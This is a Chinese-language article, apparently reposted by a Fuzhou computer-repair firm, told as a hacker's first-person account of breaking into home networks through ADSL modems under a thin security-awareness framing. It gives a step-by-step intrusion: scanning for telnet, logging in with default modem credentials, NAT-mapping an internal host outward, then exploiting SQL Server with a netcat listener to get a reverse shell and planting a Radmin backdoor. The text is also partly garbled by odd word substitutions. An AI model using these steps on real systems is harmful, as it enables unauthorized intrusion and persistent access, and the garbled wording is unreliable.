看我如何入侵ADSL加以防范安全

  这是一位所谓的＂黑客＂的口述，你没关系看一下，大概你看完后对他的技能性做法不是完全明确，但是你一定会感到一身冷汗，因为我们现在使用ADSL曾经日益广泛，但我们的安全意识还不是很强．听完他的口述希望各人在日后能增强安全防备！
  口述：
  大概看烂了网上已有的常规黑客攻击手段，对一些陈旧的入侵手法早已讨厌，近来我对ADSL MODEM的路由功能产生了浓重的兴味，颠末一番高兴，我终于找到了穿透ADSL路由入侵内网的方法，在这里和列位一同分享我的心得。
  一．扫描
  现在很多ADSL MODEM都是经过 80 23 21 三个端口来办理，但80 21端口有很多办事器都有打开，没怎么特性，于是我选择了23端口，打开我的至爱：SUPPERSCAN，填上我地点地区的IP段，（跨多几段都没关系，横竖SUPPERSCAN的速度便是快）眨眼间，结果出来了，开23的主机还真不少啊：）我挑了几台出来，在浏览器那里输入IP：218.xxx.xxx.xxx，OK。登岸对话框出来了，输入USER：ADSL pass:adsl1234（因为我这里的adsl modem一样平常是华硕的，缺省是adsl adsl1234）bingle 一矢中的，现在我便是上帝。
  二．映射
  入侵曾经成功了一半，要进一步入侵内网，我们要举行端口映射，但是我连内网的拓扑，都不知道（更不用说内网主机的端口开放情况了）又怎么映射呢？在此，我选择了推测。一样平常来说，MODEM的内网IP缺省是192．168．1．1，而大少数就把本身主机的IP设成192.168.1.2。因此我们只需试试把192．168．1．2的端口映射出来就行了（但如果使用了dhcp就麻烦了）。但是192．168．1．2到底开放了什么端口，我们基础就不知道啊，呵呵，既然不知道，那么我就把他整台主机通明地映射到外网，详细做法如下：进入NAT选项---添加NAT规则---BAMID---填入主机IP：192．168．1．2，到此192．168．1．2曾经通明地映射到192．168．1．1上了，我们访问ADSL MODEM就等于访问主机192．168．1．2了
  三．检测
  现在我们再请出SUPPERSCAN对218．xxx．xxx．xxx举行扫描，呵，看到没有？扫描结果曾经差别了，开放的端口是139 1433等，刚才只是开放了80 23 21 罢了（也便是说我们的映射曾经成功了）该是X-SCAN脱手了，用它来扫弱口令最好不过了，但扫描的结果令人扫兴，一个弱口令也没有，看来管理员还不算低B啊。
  四．溢出
  既然没有弱口令，也没开80，那只好从溢出方面动手了，但没开80 21 也就webdav .sevr-u的溢出没戏了，很自然，我领导了RPC溢出，但理论证明RPC溢出也是不行的，LSASS溢出也不行 。
  五．募然回顾，那人却在，灯火衰退处
  看来这办理员照旧比较卖力的，该打的补丁都打上了，这时侯，我的目光转移到1433上了（嘿，不知道他打了SQL补丁没有？）心动不如行动，现在只好去世马当活马医了，于是
  nc -v -l 99
  sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99
  bingle 成功地得到一个shell了。
  六．设置后门
  到这里，我们的入侵曾经成功了，余下的是扫尾留后门，至于后门，我一样平常都是用FTP上传RADMIN上去的，呵呵，这里不详谈了，信赖列位都知道。
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：